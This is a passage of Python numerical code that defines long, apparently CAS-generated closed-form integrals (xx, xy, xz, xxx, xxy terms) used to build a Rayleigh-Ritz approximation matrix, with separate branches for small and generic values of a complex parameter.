            * np.log(
                k_3 - b + b ** 2 - x ** 2 + b * x ** 2
                + k_0 * (1 + 2 * b - x ** 2)
                + np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
            )
            - 4 * k_0 * b * k_1 * k_2
            * np.log(
                k_3 - b + b ** 2 - x ** 2 + b * x ** 2
                + k_0 * (1 + 2 * b - x ** 2)
                + np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
            )
            - 4 * b ** 2 * k_12
            * np.log(
                k_3 - b + b ** 2 - x ** 2 + b * x ** 2
                + k_0 * (1 + 2 * b - x ** 2)
                + np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
            )
        ) / (
            4 * b * k_1
            * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (3 / 2)
            * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
        )
        return 4 * np.pi * c * ret
    # a ~ 0 but b away from 1: simplified limit of the closed form
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 > np.sqrt(0.00000001):
        ret = (
            x ** 2
            - b ** 2 * x ** 2
            + 2 * b * (b + x ** 2) * np.log(b)
            + 2 * b * (b + x ** 2) * np.log(1 + x ** 2)
            - 2 * b ** 2 * np.log(b + x ** 2)
            - 2 * b * x ** 2 * np.log(b + x ** 2)
        ) / (2 * (-1 + b) ** 2 * b * (b + x ** 2))
        return 4 * np.pi * c * ret
    # degenerate limit a ~ 0, b ~ 1
    if abs(a_conj) < 0.00000001 and (b - 1) ** 2 <= np.sqrt(0.00000001):
        ret = 0.5 * x ** 2 / (1 + x ** 2) ** 2
        return 4 * np.pi * c * ret
def xx_integral(a, b, c, x):
    """
    Closed-form integral used in computing the a_matrix (Rayleigh-Ritz
    approximation of the spectrum); this is the x*x second-moment term.

    Three algebraic regimes are handled separately: generic a, a ~ 0 with
    b away from 1, and the degenerate a ~ 0, b ~ 1 limit. The expressions
    are machine-derived antiderivatives (presumably exported from a CAS —
    TODO confirm); do not simplify by hand.

    @param a: complex coefficient (presumably from the piecewise Mobius
              map — TODO confirm against callers)
    @param b: real coefficient in the quadratic form (|a|^2 + b)
    @param c: multiplicative scale factor applied to the result
    @param x: upper limit of the radial variable
    @return: xx_integral value
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_1 = np.sqrt((a * a_conj + b) ** 2)
    k_2 = np.sqrt(
        (a * a_conj + b) ** 2 - 2 * a * a_conj * x ** 2 + 2 * b * x ** 2 + x ** 4
    )
    k_3 = np.sqrt(a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
    # generic closed form; divides by a**2 * a_conj**2 so requires a away from 0
    if abs(a_conj) >= 0.00000001:
        ret = (
            np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
            * (
                a ** 7 * a_conj ** 5 * (-1 + b - x ** 2)
                + a ** 6 * a_conj ** 4
                * (
                    -2 + 3 * b + 5 * b ** 2 - x ** 2 - 2 * b * x ** 2 + x ** 4
                    - 2 * a_conj ** 2 * (1 + x ** 2)
                    + b * x ** 2 * k_2
                )
                - a_conj ** 2 * (-1 + b) ** 3 * b
                * (
                    -(b ** 2) - x ** 4 + k_1 * k_2
                    + (1 + k_1) * x ** 2 * k_2
                    - b * x ** 2 * (2 + k_2)
                )
                + a ** 5 * a_conj ** 3
                * (
                    10 * b ** 3
                    + a_conj ** 4 * (-1 + b - x ** 2)
                    + 2 * a_conj ** 2 * (-2 + 2 * b - x ** 2 + x ** 4)
                    + (1 + x ** 2) * (-1 + 2 * x ** 2 + k_1 * k_2)
                    + 2 * b ** 2 * (6 + x ** 2 + 2 * x ** 2 * k_2)
                    - b * (9 - 4 * x ** 4 + k_1 * k_2 + x ** 2 * (9 - 4 * k_2 + k_1 * k_2))
                )
                + a ** 4 * a_conj ** 2
                * (
                    10 * b ** 4
                    + (1 + x ** 2) * (x ** 2 + 2 * k_1 * k_2)
                    + a_conj ** 4
                    * (
                        -2 + 3 * b + 5 * b ** 2 - x ** 2 - 2 * b * x ** 2 + x ** 4
                        + b * x ** 2 * k_2
                    )
                    + b ** 3 * (8 + x ** 2 * (8 + 6 * k_2))
                    + 2 * a_conj ** 2
                    * (
                        6 * b ** 2 * (2 + x ** 2)
                        + b * (-8 - 7 * x ** 2 + 3 * x ** 4)
                        + (1 + x ** 2) * (-1 + 2 * x ** 2 + k_1 * k_2)
                    )
                    - b ** 2
                    * (
                        -6 * x ** 4
                        + 3 * (3 + k_1 * k_2)
                        + x ** 2 * (-3 - 4 * k_2 + 3 * k_1 * k_2)
                    )
                    - b
                    * (
                        3 - 7 * x ** 4 + 5 * k_1 * k_2
                        + x ** 2 * (-8 - 6 * k_2 + 5 * k_1 * k_2)
                    )
                )
                - a * a_conj ** 3 * (-1 + b)
                * (
                    -5 * b ** 4
                    + k_1 * (1 + x ** 2) * k_2
                    - b ** 3 * (2 + x ** 2 * (7 + 4 * k_2))
                    + b ** 2
                    * (
                        -4 * x ** 4
                        + 3 * x ** 2 * (-4 + k_1 * k_2)
                        + 3 * (-1 + k_1 * k_2)
                    )
                    + b
                    * (
                        -6 * x ** 4 + 6 * k_1 * k_2
                        + x ** 2 * (-1 + 4 * k_2 + 6 * k_1 * k_2)
                    )
                )
                - a ** 2
                * (
                    (-1 + b) ** 3 * b
                    * (
                        -(b ** 2) - x ** 4 + k_1 * k_2
                        + (1 + k_1) * x ** 2 * k_2
                        - b * x ** 2 * (2 + k_2)
                    )
                    + 2 * a_conj ** 2 * (-1 + b)
                    * (
                        -(b ** 3) * (5 + 3 * x ** 2)
                        - b ** 2 * (1 + 6 * x ** 2 + x ** 4)
                        + k_1 * (1 + x ** 2) * k_2
                        + b * (-5 * x ** 4 + 5 * k_1 * k_2 + x ** 2 * (-3 + 5 * k_1 * k_2))
                    )
                    + a_conj ** 4
                    * (
                        -10 * b ** 4
                        - (1 + x ** 2) * (x ** 2 + 2 * k_1 * k_2)
                        - 2 * b ** 3 * (4 + x ** 2 * (4 + 3 * k_2))
                        + b ** 2
                        * (
                            -6 * x ** 4
                            + 3 * (3 + k_1 * k_2)
                            + x ** 2 * (-3 - 4 * k_2 + 3 * k_1 * k_2)
                        )
                        + b
                        * (
                            3 - 7 * x ** 4 + 5 * k_1 * k_2
                            + x ** 2 * (-8 - 6 * k_2 + 5 * k_1 * k_2)
                        )
                    )
                )
                - a ** 3 * a_conj
                * (
                    a_conj ** 4
                    * (
                        -10 * b ** 3
                        - (1 + x ** 2) * (-1 + 2 * x ** 2 + k_1 * k_2)
                        - 2 * b ** 2 * (6 + x ** 2 + 2 * x ** 2 * k_2)
                        + b
                        * (
                            9 - 4 * x ** 4 + k_1 * k_2
                            + x ** 2 * (9 - 4 * k_2 + k_1 * k_2)
                        )
                    )
                    + 2 * a_conj ** 2
                    * (
                        -2 * b ** 3 * (7 + 4 * x ** 2)
                        + b ** 2 * (10 + 3 * x ** 2 - 3 * x ** 4)
                        - (1 + x ** 2) * (x ** 2 + 2 * k_1 * k_2)
                        + 2 * b
                        * (
                            1 - 3 * x ** 4 + 2 * k_1 * k_2
                            + x ** 2 * (-3 + 2 * k_1 * k_2)
                        )
                    )
                    + (-1 + b)
                    * (
                        -5 * b ** 4
                        + k_1 * (1 + x ** 2) * k_2
                        - b ** 3 * (2 + x ** 2 * (7 + 4 * k_2))
                        + b ** 2
                        * (
                            -4 * x ** 4
                            + 3 * x ** 2 * (-4 + k_1 * k_2)
                            + 3 * (-1 + k_1 * k_2)
                        )
                        + b
                        * (
                            -6 * x ** 4 + 6 * k_1 * k_2
                            + x ** 2 * (-1 + 4 * k_2 + 6 * k_1 * k_2)
                        )
                    )
                )
            )
            + 4 * a ** 2 * a_conj ** 2 * b
            * (
                a ** 3 * a_conj * (-3 + a_conj ** 2)
                + 3 * a ** 2 * (-1 + a_conj ** 2 * (-1 + b) - b)
                + (-3 * a_conj ** 2 + (-1 + b) ** 2) * (1 + b)
                - a * a_conj * (3 + 3 * a_conj ** 2 + 4 * b - 3 * b ** 2)
            )
            * (1 + x ** 2) * k_2
            * np.arctanh(
                (a ** 2 * a_conj ** 2 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
                / (k_1 * k_3)
            )
            - 4 * a ** 2 * a_conj ** 2 * b
            * (
                a ** 3 * a_conj * (-3 + a_conj ** 2)
                + 3 * a ** 2 * (-1 + a_conj ** 2 * (-1 + b) - b)
                + (-3 * a_conj ** 2 + (-1 + b) ** 2) * (1 + b)
                - a * a_conj * (3 + 3 * a_conj ** 2 + 4 * b - 3 * b ** 2)
            )
            * (1 + x ** 2) * k_2
            * np.arctanh(
                (
                    a ** 2 * a_conj ** 2
                    + a * a_conj * (1 + 2 * b - x ** 2)
                    + (-1 + b) * (b + x ** 2)
                )
                / (
                    k_3
                    * np.sqrt(
                        a ** 2 * a_conj ** 2
                        + 2 * a * a_conj * (b - x ** 2)
                        + (b + x ** 2) ** 2
                    )
                )
            )
        ) / (
            2 * a ** 2 * a_conj ** 2 * b
            * (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
            * (1 + x ** 2)
            * np.sqrt(
                a ** 2 * a_conj ** 2 + 2 * a * a_conj * (b - x ** 2) + (b + x ** 2) ** 2
            )
        )
        return 2 * np.pi * c * ret
    # a ~ 0 but b away from 1: simplified limit of the closed form
    if abs(a_conj) <= 0.00000001 and (b - 1) ** 2 > np.sqrt(0.00000001):
        ret = (
            2
            - 2 * b
            - 1 / (1 + x ** 2)
            + b / (1 + x ** 2)
            - b / (b + x ** 2)
            + b ** 2 / (b + x ** 2)
            + (1 + b) * np.log(b)
            + (1 + b) * np.log(1 + x ** 2)
            - np.log(b + x ** 2)
            - b * np.log(b + x ** 2)
        ) / (-1 + b) ** 3
        return 4 * np.pi * c * ret
    # degenerate limit a ~ 0, b ~ 1
    if abs(a_conj) <= 0.00000001 and (b - 1) ** 2 <= np.sqrt(0.00000001):
        ret = x ** 4 * (3 + x ** 2) / (6 * (1 + x ** 2) ** 3)
        return 4 * np.pi * c * ret
def xy_integral(a, b, c, x):
    """
    function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)

    NOTE(review): this is a machine-generated closed-form expression (presumably
    exported from a CAS) — do not hand-edit the algebra; regenerate instead.
    @param a: complex parameter; enters mainly through k_0 = a * conj(a)
    @param b: parameter combined with k_0 inside the radicals and logs
    @param c: overall multiplicative constant applied to the result
    @param x: evaluation point of the expression
    @return: (2 / 1j) * pi * c * ret when |conj(a)| >= 1e-8, otherwise 0
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = np.sqrt((k_0 + b) ** 2)
    k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
    k_3 = a ** 2 * a_conj ** 2
    k_12 = k_1 * k_2
    # expression divides by k_3 = a**2 * a_conj**2, so guard the a -> 0 regime
    if abs(a_conj) >= 0.00000001:
        ret = (1 / (2 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (5 / 2))) * (
            (a ** 2 - a_conj ** 2)
            * (
                (
                    np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                    * (
                        a ** 5 * a_conj ** 5 * (-1 + b - x ** 2)
                        + a ** 4
                        * a_conj ** 4
                        * (
                            -2
                            + 3 * b
                            + 5 * b ** 2
                            - x ** 2
                            - 2 * b * x ** 2
                            + x ** 4
                            + b * x ** 2 * k_2
                        )
                        - (-1 + b) ** 3
                        * b
                        * (
                            -(b ** 2)
                            - x ** 4
                            + k_12
                            + (1 + k_1) * x ** 2 * k_2
                            - b * x ** 2 * (2 + k_2)
                        )
                        - a ** 3
                        * a_conj ** 3
                        * (
                            -10 * b ** 3
                            - (1 + x ** 2) * (-1 + 2 * x ** 2 + k_12)
                            - 2 * b ** 2 * (6 + x ** 2 + 2 * x ** 2 * k_2)
                            + b
                            * (9 - 4 * x ** 4 + k_12 + x ** 2 * (9 - 4 * k_2 + k_12))
                        )
                        - k_3
                        * (
                            -10 * b ** 4
                            - (1 + x ** 2) * (x ** 2 + 2 * k_12)
                            - 2 * b ** 3 * (4 + x ** 2 * (4 + 3 * k_2))
                            + b ** 2
                            * (
                                -6 * x ** 4
                                + 3 * (3 + k_12)
                                + x ** 2 * (-3 - 4 * k_2 + 3 * k_12)
                            )
                            + b
                            * (
                                3
                                - 7 * x ** 4
                                + 5 * k_12
                                + x ** 2 * (-8 - 6 * k_2 + 5 * k_12)
                            )
                        )
                        - k_0
                        * (-1 + b)
                        * (
                            -5 * b ** 4
                            + k_1 * (1 + x ** 2) * k_2
                            - b ** 3 * (2 + x ** 2 * (7 + 4 * k_2))
                            + b ** 2
                            * (-4 * x ** 4 + 3 * x ** 2 * (-4 + k_12) + 3 * (-1 + k_12))
                            + b
                            * (
                                -6 * x ** 4
                                + 6 * k_12
                                + x ** 2 * (-1 + 4 * k_2 + 6 * k_12)
                            )
                        )
                    )
                )
                / (k_3 * b * (1 + x ** 2) * k_2)
                - 12
                * (1 + k_0 + b)
                * np.log(
                    k_0
                    - b
                    + (k_0 + b) ** 2
                    + k_1 * np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                )
                - 12 * (1 + k_0 + b) * np.log(1 + x ** 2)
                + 12
                * (1 + k_0 + b)
                * np.log(
                    k_3
                    - b
                    + b ** 2
                    - x ** 2
                    + b * x ** 2
                    + k_0 * (1 + 2 * b - x ** 2)
                    + np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                    * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
                )
            )
        )
        return (2 / 1j) * np.pi * c * ret
    else:
        # small-|a| regime: the integral vanishes here (no series fallback provided)
        return 0
def xz_integral(a, b, c, x):
    """
    function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)

    NOTE(review): machine-generated closed-form algebra (presumably CAS-exported);
    do not hand-edit the expression — regenerate it instead.
    @param a: complex parameter; enters mainly through k_0 = a * conj(a)
    @param b: parameter combined with k_0 inside the radicals and arctanh terms
    @param c: overall multiplicative constant applied to the result
    @param x: evaluation point of the expression
    @return: -8 * pi * c * ret when |conj(a)| >= 1e-8, otherwise 0
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = np.sqrt((k_0 + b) ** 2)
    k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
    k_3 = a ** 2 * a_conj ** 2
    k_12 = k_1 * k_2
    # expression divides by k_0 * b, so guard the a -> 0 regime
    if abs(a_conj) >= 0.00000001:
        ret = (1 / (8 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (5 / 2))) * (
            (a + a_conj)
            * (
                (
                    np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                    * (
                        (-(a ** 5)) * a_conj ** 5 * (1 + x ** 2)
                        - a ** 4 * a_conj ** 4 * (1 + 3 * b - x ** 2) * (1 + x ** 2)
                        - (-1 + b) ** 2
                        * (1 + b)
                        * (1 + x ** 2)
                        * (-(b ** 2) - b * x ** 2 + k_12)
                        + a ** 3
                        * a_conj ** 3
                        * (
                            -2 * b ** 2 * (1 + x ** 2)
                            + 4 * b * (-5 - 2 * x ** 2 + x ** 4)
                            + (1 + x ** 2) * (1 + x ** 2 + k_12)
                        )
                        + k_3
                        * (
                            2 * b ** 3 * (1 + x ** 2)
                            + 2 * b ** 2 * (-19 - 8 * x ** 2 + 3 * x ** 4)
                            + (1 + x ** 2) * (1 - x ** 2 + k_12)
                            + b * (1 + x ** 4 + k_12 + x ** 2 * (18 + k_12))
                        )
                        - k_0
                        * (
                            -3 * b ** 4 * (1 + x ** 2)
                            - 4 * b ** 3 * (-5 - 2 * x ** 2 + x ** 4)
                            + (1 + x ** 2) * (x ** 2 + k_12)
                            + b ** 2 * (1 + x ** 4 + k_12 + x ** 2 * (18 + k_12))
                            - 2
                            * b
                            * (1 - 9 * x ** 4 + 9 * k_12 + x ** 2 * (-4 + 9 * k_12))
                        )
                    )
                )
                / (k_0 * b * (1 + x ** 2) * k_2)
                - 12
                * (-1 + (k_0 + b) ** 2)
                * np.arctanh(
                    (k_3 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
                    / (k_1 * np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)))
                )
                + 12
                * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                * np.arctanh(
                    (
                        k_3
                        + b ** 2
                        - x ** 2
                        + k_0 * (1 + 2 * b - x ** 2)
                        + b * (-1 + x ** 2)
                    )
                    / (
                        np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                        * np.sqrt((k_0 + b) ** 2 - 2 * (k_0 - b) * x ** 2 + x ** 4)
                    )
                )
                - 24
                * (1 + k_0 - b)
                * np.arctanh(
                    (
                        k_3
                        + b ** 2
                        - x ** 2
                        + k_0 * (1 + 2 * b - x ** 2)
                        + b * (-1 + x ** 2)
                    )
                    / (
                        np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                        * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
                    )
                )
            )
        )
        return -8 * np.pi * c * ret
    else:
        # small-|a| regime: the integral vanishes here (no series fallback provided)
        return 0
def xxx_integral(a, b, c, x):
    """
    function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)

    NOTE(review): machine-generated closed-form algebra (presumably CAS-exported);
    do not hand-edit the expression — regenerate it instead.
    @param a: complex parameter; enters mainly through k_0 = a * conj(a)
    @param b: parameter combined with k_0 inside the radicals and logs
    @param c: overall multiplicative constant applied to the result
    @param x: evaluation point of the expression
    @return: 4 * pi * c * ret when |conj(a)| >= 1e-8, otherwise 0
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = np.sqrt((k_0 + b) ** 2)
    k_2 = a * a_conj ** 3
    k_3 = a ** 2 * a_conj ** 2
    k_4 = a * a_conj ** 4
    # expression divides by a**3 * a_conj**3 and b, so guard the a -> 0 regime
    if abs(a_conj) >= 0.00000001:
        ret = (1 / (4 * a ** 3 * a_conj ** 3)) * (
            -(a ** 3)
            + a ** 4 * a_conj
            - a_conj ** 3
            + k_4
            + 2 * (a ** 3 + a_conj ** 3)
            + a ** 3 * b
            + a_conj ** 3 * b
            - (1 / (b * (k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3))
            * (
                k_1
                * (
                    a ** 9 * a_conj ** 6 * b
                    + a_conj ** 3 * (-1 + b) ** 5 * b ** 2
                    + k_4 * (-1 + b) ** 3 * b * (2 + 5 * b + 6 * b ** 2)
                    + a ** 8 * a_conj ** 5 * (-1 + 7 * b + 6 * b ** 2)
                    + a ** 7
                    * a_conj ** 4
                    * (-3 - 3 * a_conj ** 2 + 22 * b + 23 * b ** 2 + 15 * b ** 3)
                    + a ** 6
                    * a_conj ** 3
                    * (
                        -3
                        - 3 * a_conj ** 4
                        - b
                        + a_conj ** 6 * b
                        + 32 * b ** 2
                        + 22 * b ** 3
                        + 20 * b ** 4
                        + a_conj ** 2 * (-9 + 30 * b)
                    )
                    + a ** 5
                    * a_conj ** 2
                    * (
                        -1
                        - 19 * b
                        + 3 * b ** 2
                        + 4 * b ** 3
                        - 2 * b ** 4
                        + 15 * b ** 5
                        + a_conj ** 4 * (-9 + 30 * b)
                        + a_conj ** 6 * (-1 + 7 * b + 6 * b ** 2)
                        + 3 * a_conj ** 2 * (-3 - 5 * b + 22 * b ** 2)
                    )
                    + a ** 4
                    * (
                        a_conj * (-1 + b) ** 3 * b * (2 + 5 * b + 6 * b ** 2)
                        + 3 * a_conj ** 5 * (-3 - 5 * b + 22 * b ** 2)
                        + 3 * a_conj ** 3 * (-1 - 14 * b + 5 * b ** 2 + 10 * b ** 3)
                        + a_conj ** 7 * (-3 + 22 * b + 23 * b ** 2 + 15 * b ** 3)
                    )
                    + a ** 2
                    * a_conj ** 3
                    * (-1 + b)
                    * (
                        -3 * (-1 + b) ** 2 * b
                        + a_conj ** 2
                        * (1 + 20 * b + 17 * b ** 2 + 13 * b ** 3 + 15 * b ** 4)
                    )
                    + a ** 3
                    * (
                        -3 * a_conj ** 2 * (-1 + b) ** 3 * b
                        + (-1 + b) ** 5 * b ** 2
                        + 3 * a_conj ** 4 * (-1 - 14 * b + 5 * b ** 2 + 10 * b ** 3)
                        + a_conj ** 6
                        * (-3 - b + 32 * b ** 2 + 22 * b ** 3 + 20 * b ** 4)
                    )
                )
            )
            - ((a ** 3 + a_conj ** 3) * (-1 + k_0 + b)) / (1 + x ** 2) ** 2
            - (2 * (a ** 3 + a_conj ** 3)) / (1 + x ** 2)
            + (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** 3)
            * (
                np.sqrt(-4 * k_0 * x ** 2 + (k_0 + b + x ** 2) ** 2)
                * (
                    (1 / (1 + x ** 2) ** 2)
                    * (
                        (a + a_conj)
                        * (k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                        * (
                            a ** 6 * a_conj ** 4
                            + a_conj ** 2 * (-1 + b) ** 4
                            + a ** 5 * a_conj ** 3 * (2 - a_conj ** 2 + 4 * b)
                            + a ** 4
                            * (
                                a_conj ** 6
                                + 6 * a_conj ** 2 * b ** 2
                                - 2 * a_conj ** 4 * (1 + 2 * b)
                            )
                            + a ** 2
                            * (
                                (-1 + b) ** 4
                                + 6 * a_conj ** 4 * b ** 2
                                - 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 2 * b)
                            )
                            + a
                            * (
                                (-a_conj) * (-1 + b) ** 4
                                + a_conj ** 3 * (-1 + b) ** 2 * (2 + 4 * b)
                            )
                            + 2
                            * a ** 3
                            * (
                                a_conj ** 5 * (1 + 2 * b)
                                + a_conj * (-1 + b) ** 2 * (1 + 2 * b)
                                - 3 * a_conj ** 3 * (1 + b ** 2)
                            )
                        )
                    )
                    + (1 / (1 + x ** 2))
                    * (
                        3 * a ** 8 * a_conj ** 5
                        + a_conj ** 3 * (-1 + b) ** 5
                        + 13 * a ** 7 * a_conj ** 4 * (1 + b)
                        + 7 * k_4 * (-1 + b) ** 3 * (1 + b)
                        + 2
                        * a ** 6
                        * a_conj ** 3
                        * (-1 + 12 * a_conj ** 2 + 11 * b + 11 * b ** 2)
                        + 18 * a ** 2 * a_conj ** 5 * (-1 + b ** 3)
                        + a ** 4
                        * (
                            13 * a_conj ** 7 * (1 + b)
                            + 7 * a_conj * (-1 + b) ** 3 * (1 + b)
                            + 6 * a_conj ** 5 * (1 + 8 * b)
                            + 6 * a_conj ** 3 * (-3 - b + 4 * b ** 2)
                        )
                        + a ** 3
                        * (
                            (-1 + b) ** 5
                            + 6 * a_conj ** 4 * (-3 - b + 4 * b ** 2)
                            + a_conj ** 6 * (-2 + 22 * b + 22 * b ** 2)
                        )
                        + 3
                        * a ** 5
                        * (
                            8 * a_conj ** 6
                            + a_conj ** 8
                            + 2 * a_conj ** 4 * (1 + 8 * b)
                            + 6 * a_conj ** 2 * (-1 + b ** 3)
                        )
                    )
                    - (1 / (b * (k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)))
                    * (
                        k_0
                        * (a + a_conj) ** 3
                        * (
                            a ** 6 * a_conj ** 6
                            + (-1 + b) ** 3 * b ** 2 * (b + x ** 2)
                            - a ** 5 * a_conj ** 5 * (-3 + 2 * b + x ** 2)
                            + a ** 4
                            * a_conj ** 4
                            * (3 - 17 * b ** 2 - 3 * x ** 2 - 3 * b * (-3 + x ** 2))
                            + a ** 3
                            * a_conj ** 3
                            * (
                                1
                                - 28 * b ** 3
                                - 3 * x ** 2
                                - 2 * b ** 2 * (-3 + x ** 2)
                                - 12 * b * (-1 + x ** 2)
                            )
                            - k_3
                            * (
                                17 * b ** 4
                                + x ** 2
                                - 2 * b ** 3 * (-3 + x ** 2)
                                + 18 * b ** 2 * (-1 + x ** 2)
                                + b * (-1 + 3 * x ** 2)
                            )
                            - k_0
                            * (-1 + b)
                            * b
                            * (
                                2 * b ** 3
                                + 6 * x ** 2
                                + b ** 2 * (11 - 3 * x ** 2)
                                + b * (-1 + 9 * x ** 2)
                            )
                        )
                    )
                )
            )
            + (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
            * (
                12
                * a ** 3
                * a_conj ** 3
                * (a + a_conj)
                * (
                    a ** 4 * a_conj ** 2 * (-2 + a_conj ** 2)
                    - 4 * k_2 * (1 + b)
                    + 4 * a ** 3 * a_conj * (-1 + (-1 + a_conj ** 2) * b)
                    + 4 * k_0 * b * (-1 + b + b ** 2)
                    - 2 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                    + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                    - 2
                    * a ** 2
                    * (
                        1
                        + a_conj ** 4
                        + 3 * b
                        + b ** 2
                        - a_conj ** 2 * (-1 + b + 3 * b ** 2)
                    )
                )
                * np.log(
                    k_0
                    - b
                    + (k_0 + b) ** 2
                    + k_1 * np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                )
            )
            + (
                12
                * a ** 3
                * a_conj ** 3
                * (a + a_conj)
                * (
                    a ** 4 * a_conj ** 2 * (-2 + a_conj ** 2)
                    - 4 * k_2 * (1 + b)
                    + 4 * a ** 3 * a_conj * (-1 + (-1 + a_conj ** 2) * b)
                    + 4 * k_0 * b * (-1 + b + b ** 2)
                    - 2 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                    + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                    - 2
                    * a ** 2
                    * (
                        1
                        + a_conj ** 4
                        + 3 * b
                        + b ** 2
                        - a_conj ** 2 * (-1 + b + 3 * b ** 2)
                    )
                )
                * np.log(1 + x ** 2)
            )
            / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2)
            - (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (7 / 2))
            * (
                12
                * a ** 3
                * a_conj ** 3
                * (a + a_conj)
                * (
                    a ** 4 * a_conj ** 2 * (-2 + a_conj ** 2)
                    - 4 * k_2 * (1 + b)
                    + 4 * a ** 3 * a_conj * (-1 + (-1 + a_conj ** 2) * b)
                    + 4 * k_0 * b * (-1 + b + b ** 2)
                    - 2 * a_conj ** 2 * (1 + 3 * b + b ** 2)
                    + (-1 + b) ** 2 * (1 + 4 * b + b ** 2)
                    - 2
                    * a ** 2
                    * (
                        1
                        + a_conj ** 4
                        + 3 * b
                        + b ** 2
                        - a_conj ** 2 * (-1 + b + 3 * b ** 2)
                    )
                )
                * np.log(
                    k_0
                    - b
                    + (k_0 + b) ** 2
                    - x ** 2
                    - k_0 * x ** 2
                    + b * x ** 2
                    + np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                    * np.sqrt(-4 * k_0 * x ** 2 + (k_0 + b + x ** 2) ** 2)
                )
            )
        )
        return 4 * np.pi * c * ret
    else:
        # small-|a| regime: the integral vanishes here (no series fallback provided)
        return 0
def xxy_integral(a, b, c, x):
    """
    function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)

    NOTE(review): machine-generated closed-form algebra (presumably CAS-exported);
    do not hand-edit the expression — regenerate it instead.
    @param a: complex parameter; enters mainly through k_0 = a * conj(a)
    @param b: parameter combined with k_0 inside the radicals and logs
    @param c: overall multiplicative constant applied to the result
    @param x: evaluation point of the expression
    @return: (4 / 1j) * pi * c * ret when |conj(a)| >= 1e-8, otherwise 0
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = np.sqrt((k_0 + b) ** 2)
    k_2 = a ** 3 * a_conj ** 3
    k_3 = a ** 2 * a_conj ** 2
    # expression divides by k_2 = a**3 * a_conj**3 and b, so guard the a -> 0 regime
    if abs(a_conj) >= 0.00000001:
        ret = (
            (1 / 4)
            * (a - a_conj)
            * (
                (2 * (a ** 2 + k_0 + a_conj ** 2)) / k_2
                + ((a ** 2 + k_0 + a_conj ** 2) * (-1 + k_0 + b)) / k_2
                - (1 / (k_2 * b * (k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3))
                * (
                    k_1
                    * (
                        a ** 8 * a_conj ** 6 * b
                        + a_conj ** 2 * (-1 + b) ** 5 * b ** 2
                        + a ** 7
                        * a_conj ** 5
                        * (-1 + (7 + a_conj ** 2) * b + 6 * b ** 2)
                        + k_0
                        * b
                        * (
                            (-1 + b) ** 5 * b
                            + a_conj ** 2 * (-1 + b) ** 3 * (2 + 5 * b + 6 * b ** 2)
                        )
                        + a ** 6
                        * a_conj ** 4
                        * (
                            -3
                            + 22 * b
                            + a_conj ** 4 * b
                            + 23 * b ** 2
                            + 15 * b ** 3
                            + a_conj ** 2 * (-2 + 7 * b + 6 * b ** 2)
                        )
                        + a ** 5
                        * a_conj ** 3
                        * (
                            -3
                            - b
                            + 32 * b ** 2
                            + 22 * b ** 3
                            + 20 * b ** 4
                            + a_conj ** 4 * (-1 + 7 * b + 6 * b ** 2)
